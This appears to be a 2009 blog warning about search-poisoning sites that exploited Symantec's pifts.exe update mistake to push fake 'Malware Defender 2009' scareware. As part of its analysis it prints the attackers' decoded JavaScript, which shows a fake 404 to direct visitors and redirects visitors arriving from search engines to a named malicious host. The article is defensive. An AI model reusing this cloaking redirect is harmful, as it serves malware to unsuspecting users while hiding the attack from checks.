11th March 2009

Warning to users of Symantec/Norton Anti-Virus and Internet Security

Update: There is an official Symantec response on their forums, you can find it here.

______________

You are at risk from malware infection if you search Google, MSN, Yahoo and possibly other search engines for 'pifts.exe'. Details follow.

On Monday, Symantec screwed up an update causing pifts.exe to bring up shadey error messages. While it's unclear at the moment what's been happening over at Symantec's forums, it appears they have been removing posts related to pifts.exe due to either a bot spamming their forums, or simply because of too many complaints from users.

Either way, because there is no information users have shifted their searches to Google and the like. Malware vendors have jumped straight at the opportunity and crafted websites to pretend to offer information on pifts.exe, while trying to lure users to download viruses and malware.

In short, do not use any search engine to search for pifts.exe, and do not download any promised patches/fixes or updates from anywhere other than symantec.com or you risk infection.

At the time of writing this, there is no word from Symantec, please be patient and avoid Googling for a solution.

For the nerds out there, below is a breakdown of how the malware infects user's PCs.

How the Attack Works

The top Google search results for 'pifts.exe' are infected with malware, this is done via Javascript and will show you what appears to be Windows Explorer showing 'My Computer' with security alerts on all your drives. This is not real, it is a web page designed to look like Windows Explorer.

Image showing fake Windows Explorer Web Page
The fake Windows Explorer Web Page

When the page loads, you will receive a popup message saying:

"Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! Malware Defender 2009 will perform a quick and free scanning of your PC for viruses and malicious programs."

The scan will pretend to run, then inform you that "Your computer remains infected by Viruses!...". You will receive a pop-up similar to that shown below, which will attempt to download malware onto your PC.

Image showing fake Windows Explorer Web Page
Fake anti-virus warning

The Javascript

The Javascript code used on infected websites offering solutions to the problem is URL encoded to obscure the code, the decoded Javascript is as follows. I've tidied it up a bit so it's more readable.

var r = document.referrer;

if (r.indexOf("google") != -1 || r.indexOf("msn") != -1 ||
    r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 ||
    r.indexOf("result") != -1 || r.indexOf("cache") != -1 ||
    r.indexOf("translate") != -1)
{
    document.location = "http://murtinreid.com/in.php?n=1500&s="+
                        escape(location.hostname)+
                        "&p=" + escape(r).replace(/\+/g,"%2B")
} else {
    document.title = "404 Not Found";
    document.write("<h1>Not Found</h1>The requested URL " +
        location.pathname + " was not found on this server.<p>" + 
        "<hr><address>Apache/1.3.39 Server at " +<br/>location.hostname + 
        " Port 80</address><br/><div style='display:none'>")
}

Basically what the code does is check whether you've come to the website from a search engine, or entered the URL directly. If you've come from a search engine, you are redirected to the URL: 'murtinreid.com/in.php?n=1500&s=' which hosts the sites shown above and the malware.

Again, do not download any security updates from anywhere other than symantec.com.